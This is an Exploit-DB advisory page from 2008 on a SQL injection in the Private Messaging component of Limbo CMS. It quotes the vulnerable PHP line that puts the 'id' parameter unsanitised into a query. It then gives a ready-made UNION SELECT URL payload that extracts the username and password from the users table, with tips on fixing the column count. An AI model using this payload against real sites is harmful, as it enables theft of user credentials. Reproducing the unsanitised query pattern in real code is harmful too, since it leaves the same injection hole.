Lucene search

K
exploitdbStAkeREDB-ID:6796
HistoryOct 21, 2008 - 12:00 a.m.

Limbo CMS - Private Messaging Component SQL Injection

2008-10-2100:00:00
StAkeR
www.exploit-db.com
29

AI Score

7.4

Confidence

Low

/*
   
   Limbo CMS (Private Messaging Component) Remote SQL Injection Vulnerability
   --------------------------------------------------------------------------
   StAkeR[at]hotmail[dot]it
   http://www.limboportal.com/index.php/option/downloads/task/download/id/108
   --------------------------------------------------------------------------

   com_privmsg/open.php
   
   31. if (isset($_GET['status']))
   32. {
   33. 	  header('Location:index.php?option=pms&page=open&id='.$_GET['id'].'');
   34. }
   35. 
   36. $openrow= $conn->GetRow("SELECT * FROM #__pms WHERE id='$_GET[id]' AND username='$my->username'");
   37.
   
   
   - index.php?option=pms&page=open&id='1+union+all+select+password,username+from+[prefix_users]+where+id=1/*
   
   (Syntax Error) Change number of columns (Ex: 0,0,0,username,password) 
   
   

*/

# milw0rm.com [2008-10-21]

AI Score

7.4

Confidence

Low

Related for EDB-ID:6796